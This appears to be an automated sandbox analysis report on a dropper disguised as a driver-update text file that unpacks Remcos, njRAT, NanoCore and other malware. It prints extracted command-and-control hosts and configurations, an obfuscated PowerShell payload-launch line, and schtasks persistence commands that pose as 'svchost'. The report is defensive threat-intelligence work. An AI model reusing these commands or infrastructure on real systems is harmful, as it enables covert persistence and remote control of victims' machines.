nanocore | 393732bdd7df3cbbcc35dca3397178466f32de8ebd266ad5791c000288771bc5

Analysis

max time kernel
82s
max time network
100s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
08-09-2024 14:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

driverupdate_report_windows_10_22h2.txt.exe
Size

13.8MB
MD5

8360a6245b4ae84a5b6e4784d7802472
SHA1

192f6d4a68ec867c5919a5d5fd4c782bf9c39127
SHA256

393732bdd7df3cbbcc35dca3397178466f32de8ebd266ad5791c000288771bc5
SHA512

38b4630ab40c84f822fe860038c4c48d0ea31ceaa23d05d01f599c08f44a3fe45113f4386f1874799dfb15e7d7930c369c2eeba11129adfa3f9154264cbcc63b
SSDEEP

49152:M3QhanbDdeZ6Hfa/nkNQzlJ7r5oP3TXyymMknH76EAaIilSH7YNjMn80iA+cpUGN:Mn

Score

10^/10

nanocore njrat remcos august crypter toolz grace stub hacked bootkit defense_evasion discovery evasion execution keylogger persistence privilege_escalation rat spyware stealer trojan upx

Malware Config

Extracted

Family

remcos

Botnet

AUGUST CRYPTER TOOLZ GRACE STUB

teamfavour222.ddns.net :6767

odogwuvisual123.duckdns.org:6767

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
-YFLE4M
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

192.168.1.42:5552

Mutex

bf7b1fe7a7644171a9985ea45221c25c

Attributes

reg_key
bf7b1fe7a7644171a9985ea45221c25c
splitter
|'|'|

Extracted

Family

nanocore

Version

1.2.2.0

hiatus2.ddns.net:1604

127.0.0.1:1604

Mutex

e7e30201-c342-4921-abc6-2182083982ff

Attributes

activate_away_mode
true
backup_connection_host
127.0.0.1
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2024-05-31T20:09:09.303717636Z
bypass_user_account_control
true
bypass_user_account_control_data
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
1604
default_group
Default
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
e7e30201-c342-4921-abc6-2182083982ff
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
hiatus2.ddns.net
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
true
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Sub\\Client.exe"	Client.exe

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
11	2468	powershell.exe

Downloads MZ/PE file
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
persistence privilege_escalation

AppInit DLLs
T1546.010

Executes dropped EXE 21 IoCs

pid	Process
2536	7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe
2680	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe
2780	BlueScreen.exe
2704	CirnoBackdoorLOL.exe
2880	172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
3028	~DeB693.tmp
2640	cleansaturn.exe
2632	concos_1.6.exe
2904	error.exe
1996	colorful screen darkener.exe
1908	Client.exe
1808	levislocker.exe
2700	malecus.exe
2424	evil.exe
2024	Solaris.exe
2996	TEST.exe
2932	ss.exe
2144	YT_Bot.exe
1224	CirnoBackdoorLOL.exe
1812	javawvd.exe
1740	Microsoft To Do.exe

Loads dropped DLL 29 IoCs

pid	Process
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
1928	driverupdate_report_windows_10_22h2.txt.exe
3028	~DeB693.tmp
3028	~DeB693.tmp
3028	~DeB693.tmp
3028	~DeB693.tmp
1268	cmd.exe

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00060000000191ad-25.dat	upx
behavioral1/memory/2780-29-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral1/files/0x0008000000019219-48.dat	upx
behavioral1/memory/2880-57-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/files/0x00050000000193f0-66.dat	upx
behavioral1/memory/2904-79-0x0000000000400000-0x000000000040D000-memory.dmp	upx
behavioral1/memory/2880-207-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2904-209-0x0000000000400000-0x000000000040D000-memory.dmp	upx
behavioral1/memory/2880-211-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2880-274-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2880-348-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2880-448-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2880-534-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2880-638-0x0000000000400000-0x000000000048A000-memory.dmp	upx

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Explorer = "C:\\Program Files (x86)\\Windows NT\\explorer.exe"	7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Explorer = "C:\\Program Files (x86)\\Windows NT\\explorer.exe"	7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Sub\\WatchDog.exe"	Client.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\DriverrHub\\Microsoft To Do.exe\""	TEST.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ss.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

T1102

flow	ioc
29	discord.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	concos_1.6.exe
File opened for modification	\??\PhysicalDrive0	malecus.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2144	YT_Bot.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Windows NT\explorer.exe	7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Windows NT\explorer.exe	7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Windows NT\RCXBDC3.tmp	7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\xdwd.dll	Client.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1540	Powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	levislocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YT_Bot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javawvd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	javawvd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	driverupdate_report_windows_10_22h2.txt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	error.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ss.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CirnoBackdoorLOL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BlueScreen.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CirnoBackdoorLOL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	javawvd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	~DeB693.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	evil.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	CirnoBackdoorLOL.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	javawvd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	javawvd.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	CirnoBackdoorLOL.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2312	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2716	schtasks.exe
1920	schtasks.exe
2268	schtasks.exe
1020	schtasks.exe
1688	schtasks.exe
2412	schtasks.exe
1756	schtasks.exe
1604	schtasks.exe
1696	schtasks.exe
2508	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1812	javawvd.exe
1812	javawvd.exe
1812	javawvd.exe
1812	javawvd.exe
1812	javawvd.exe
1812	javawvd.exe
1812	javawvd.exe
1812	javawvd.exe
1812	javawvd.exe
1812	javawvd.exe
2932	ss.exe
2932	ss.exe
2932	ss.exe
1540	Powershell.exe
2468	powershell.exe
2996	TEST.exe
2996	TEST.exe
2996	TEST.exe
2932	ss.exe
2932	ss.exe
2932	ss.exe
2932	ss.exe
2932	ss.exe
2932	ss.exe
2932	ss.exe
2932	ss.exe
2932	ss.exe
1540	Powershell.exe
1540	Powershell.exe
1540	Powershell.exe
1540	Powershell.exe
1540	Powershell.exe
1812	javawvd.exe
1812	javawvd.exe
1908	Client.exe
1908	Client.exe
1908	Client.exe
1908	Client.exe
1908	Client.exe
1908	Client.exe
1908	Client.exe
1908	Client.exe
1908	Client.exe
1908	Client.exe
1908	Client.exe
1908	Client.exe
1908	Client.exe
1908	Client.exe
1908	Client.exe
1908	Client.exe
2792	CMD.exe
1908	Client.exe
1908	Client.exe
1908	Client.exe
2380	CMD.exe
1908	Client.exe
1908	Client.exe
1920	schtasks.exe
1516	CMD.exe
1908	Client.exe
1600	CMD.exe
1908	Client.exe
2028	CMD.exe
1604	schtasks.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2932	ss.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	2640	cleansaturn.exe
Token: SeDebugPrivilege	1908	Client.exe
Token: SeDebugPrivilege	2932	ss.exe
Token: SeDebugPrivilege	1540	Powershell.exe
Token: SeDebugPrivilege	2468	powershell.exe
Token: SeDebugPrivilege	2996	TEST.exe
Token: SeDebugPrivilege	1740	Microsoft To Do.exe
Token: SeShutdownPrivilege	2700	malecus.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2144	YT_Bot.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1928 wrote to memory of 2536	1928	driverupdate_report_windows_10_22h2.txt.exe	30
PID 1928 wrote to memory of 2536	1928	driverupdate_report_windows_10_22h2.txt.exe	30
PID 1928 wrote to memory of 2536	1928	driverupdate_report_windows_10_22h2.txt.exe	30
PID 1928 wrote to memory of 2536	1928	driverupdate_report_windows_10_22h2.txt.exe	30
PID 1928 wrote to memory of 2680	1928	driverupdate_report_windows_10_22h2.txt.exe	31
PID 1928 wrote to memory of 2680	1928	driverupdate_report_windows_10_22h2.txt.exe	31
PID 1928 wrote to memory of 2680	1928	driverupdate_report_windows_10_22h2.txt.exe	31
PID 1928 wrote to memory of 2680	1928	driverupdate_report_windows_10_22h2.txt.exe	31
PID 1928 wrote to memory of 2780	1928	driverupdate_report_windows_10_22h2.txt.exe	32
PID 1928 wrote to memory of 2780	1928	driverupdate_report_windows_10_22h2.txt.exe	32
PID 1928 wrote to memory of 2780	1928	driverupdate_report_windows_10_22h2.txt.exe	32
PID 1928 wrote to memory of 2780	1928	driverupdate_report_windows_10_22h2.txt.exe	32
PID 1928 wrote to memory of 2704	1928	driverupdate_report_windows_10_22h2.txt.exe	33
PID 1928 wrote to memory of 2704	1928	driverupdate_report_windows_10_22h2.txt.exe	33
PID 1928 wrote to memory of 2704	1928	driverupdate_report_windows_10_22h2.txt.exe	33
PID 1928 wrote to memory of 2704	1928	driverupdate_report_windows_10_22h2.txt.exe	33
PID 1928 wrote to memory of 2880	1928	driverupdate_report_windows_10_22h2.txt.exe	34
PID 1928 wrote to memory of 2880	1928	driverupdate_report_windows_10_22h2.txt.exe	34
PID 1928 wrote to memory of 2880	1928	driverupdate_report_windows_10_22h2.txt.exe	34
PID 1928 wrote to memory of 2880	1928	driverupdate_report_windows_10_22h2.txt.exe	34
PID 2704 wrote to memory of 3028	2704	CirnoBackdoorLOL.exe	35
PID 2704 wrote to memory of 3028	2704	CirnoBackdoorLOL.exe	35
PID 2704 wrote to memory of 3028	2704	CirnoBackdoorLOL.exe	35
PID 2704 wrote to memory of 3028	2704	CirnoBackdoorLOL.exe	35
PID 1928 wrote to memory of 2640	1928	driverupdate_report_windows_10_22h2.txt.exe	36
PID 1928 wrote to memory of 2640	1928	driverupdate_report_windows_10_22h2.txt.exe	36
PID 1928 wrote to memory of 2640	1928	driverupdate_report_windows_10_22h2.txt.exe	36
PID 1928 wrote to memory of 2640	1928	driverupdate_report_windows_10_22h2.txt.exe	36
PID 1928 wrote to memory of 2904	1928	driverupdate_report_windows_10_22h2.txt.exe	38
PID 1928 wrote to memory of 2904	1928	driverupdate_report_windows_10_22h2.txt.exe	38
PID 1928 wrote to memory of 2904	1928	driverupdate_report_windows_10_22h2.txt.exe	38
PID 1928 wrote to memory of 2904	1928	driverupdate_report_windows_10_22h2.txt.exe	38
PID 1928 wrote to memory of 2632	1928	driverupdate_report_windows_10_22h2.txt.exe	39
PID 1928 wrote to memory of 2632	1928	driverupdate_report_windows_10_22h2.txt.exe	39
PID 1928 wrote to memory of 2632	1928	driverupdate_report_windows_10_22h2.txt.exe	39
PID 1928 wrote to memory of 2632	1928	driverupdate_report_windows_10_22h2.txt.exe	39
PID 1928 wrote to memory of 1996	1928	driverupdate_report_windows_10_22h2.txt.exe	40
PID 1928 wrote to memory of 1996	1928	driverupdate_report_windows_10_22h2.txt.exe	40
PID 1928 wrote to memory of 1996	1928	driverupdate_report_windows_10_22h2.txt.exe	40
PID 1928 wrote to memory of 1996	1928	driverupdate_report_windows_10_22h2.txt.exe	40
PID 1928 wrote to memory of 1908	1928	driverupdate_report_windows_10_22h2.txt.exe	42
PID 1928 wrote to memory of 1908	1928	driverupdate_report_windows_10_22h2.txt.exe	42
PID 1928 wrote to memory of 1908	1928	driverupdate_report_windows_10_22h2.txt.exe	42
PID 1928 wrote to memory of 1908	1928	driverupdate_report_windows_10_22h2.txt.exe	42
PID 1928 wrote to memory of 1808	1928	driverupdate_report_windows_10_22h2.txt.exe	43
PID 1928 wrote to memory of 1808	1928	driverupdate_report_windows_10_22h2.txt.exe	43
PID 1928 wrote to memory of 1808	1928	driverupdate_report_windows_10_22h2.txt.exe	43
PID 1928 wrote to memory of 1808	1928	driverupdate_report_windows_10_22h2.txt.exe	43
PID 1928 wrote to memory of 2700	1928	driverupdate_report_windows_10_22h2.txt.exe	44
PID 1928 wrote to memory of 2700	1928	driverupdate_report_windows_10_22h2.txt.exe	44
PID 1928 wrote to memory of 2700	1928	driverupdate_report_windows_10_22h2.txt.exe	44
PID 1928 wrote to memory of 2700	1928	driverupdate_report_windows_10_22h2.txt.exe	44
PID 1928 wrote to memory of 2424	1928	driverupdate_report_windows_10_22h2.txt.exe	46
PID 1928 wrote to memory of 2424	1928	driverupdate_report_windows_10_22h2.txt.exe	46
PID 1928 wrote to memory of 2424	1928	driverupdate_report_windows_10_22h2.txt.exe	46
PID 1928 wrote to memory of 2424	1928	driverupdate_report_windows_10_22h2.txt.exe	46
PID 1928 wrote to memory of 2024	1928	driverupdate_report_windows_10_22h2.txt.exe	47
PID 1928 wrote to memory of 2024	1928	driverupdate_report_windows_10_22h2.txt.exe	47
PID 1928 wrote to memory of 2024	1928	driverupdate_report_windows_10_22h2.txt.exe	47
PID 1928 wrote to memory of 2024	1928	driverupdate_report_windows_10_22h2.txt.exe	47
PID 1928 wrote to memory of 2996	1928	driverupdate_report_windows_10_22h2.txt.exe	48
PID 1928 wrote to memory of 2996	1928	driverupdate_report_windows_10_22h2.txt.exe	48
PID 1928 wrote to memory of 2996	1928	driverupdate_report_windows_10_22h2.txt.exe	48
PID 1928 wrote to memory of 2996	1928	driverupdate_report_windows_10_22h2.txt.exe	48

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\driverupdate_report_windows_10_22h2.txt.exe
"C:\Users\Admin\AppData\Local\Temp\driverupdate_report_windows_10_22h2.txt.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1928
- C:\Users\Admin\AppData\Local\Temp\7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe
  "C:\Users\Admin\AppData\Local\Temp\7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:2536
- C:\Users\Admin\AppData\Local\Temp\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe
  "C:\Users\Admin\AppData\Local\Temp\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2680
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    "Powershell.exe" -windowstyle minimized "$Teratism249 = Get-Content 'C:\Users\Admin\AppData\Local\Temp\celleslim\farve\pitiableness\Guldtand.Spi168' ; $Neglefilen=$Teratism249.SubString(69482,3);.$Neglefilen($Teratism249) "
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1540
- C:\Users\Admin\AppData\Local\Temp\BlueScreen.exe
  "C:\Users\Admin\AppData\Local\Temp\BlueScreen.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2780
- C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe
  "C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2704
- - C:\Users\Admin\AppData\Local\Temp\~DeB693.tmp
    C:\Users\Admin\AppData\Local\Temp\~DeB693.tmp _$PID:116 _$EXE:C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe _$CMDLINE:
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:3028
  - - C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe
      C:\Users\Admin\AppData\Local\Temp\\CirnoBackdoorLOL.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      PID:1224
  - - C:\Users\Admin\AppData\Local\Temp\javawvd.exe
      C:\Users\Admin\AppData\Local\Temp\javawvd.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:1812
- C:\Users\Admin\AppData\Local\Temp\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
  "C:\Users\Admin\AppData\Local\Temp\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2880
- C:\Users\Admin\AppData\Local\Temp\cleansaturn.exe
  "C:\Users\Admin\AppData\Local\Temp\cleansaturn.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2640
- C:\Users\Admin\AppData\Local\Temp\error.exe
  "C:\Users\Admin\AppData\Local\Temp\error.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2904
- C:\Users\Admin\AppData\Local\Temp\concos_1.6.exe
  "C:\Users\Admin\AppData\Local\Temp\concos_1.6.exe"
  2⤵
  - Executes dropped EXE
  - Writes to the Master Boot Record (MBR)
  PID:2632
- C:\Users\Admin\AppData\Local\Temp\colorful screen darkener.exe
  "C:\Users\Admin\AppData\Local\Temp\colorful screen darkener.exe"
  2⤵
  - Executes dropped EXE
  PID:1996
- C:\Users\Admin\AppData\Local\Temp\Client.exe
  "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1908
- - C:\Windows\system32\CMD.exe
    "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" & exit
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2792
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      Suspicious behavior: EnumeratesProcesses
      PID:1920
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2380
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      Suspicious behavior: EnumeratesProcesses
      PID:1604
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1516
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1696
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1600
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2268
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2028
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1020
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
    3⤵
    PID:1904
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1688
- - C:\Windows\system32\CMD.exe
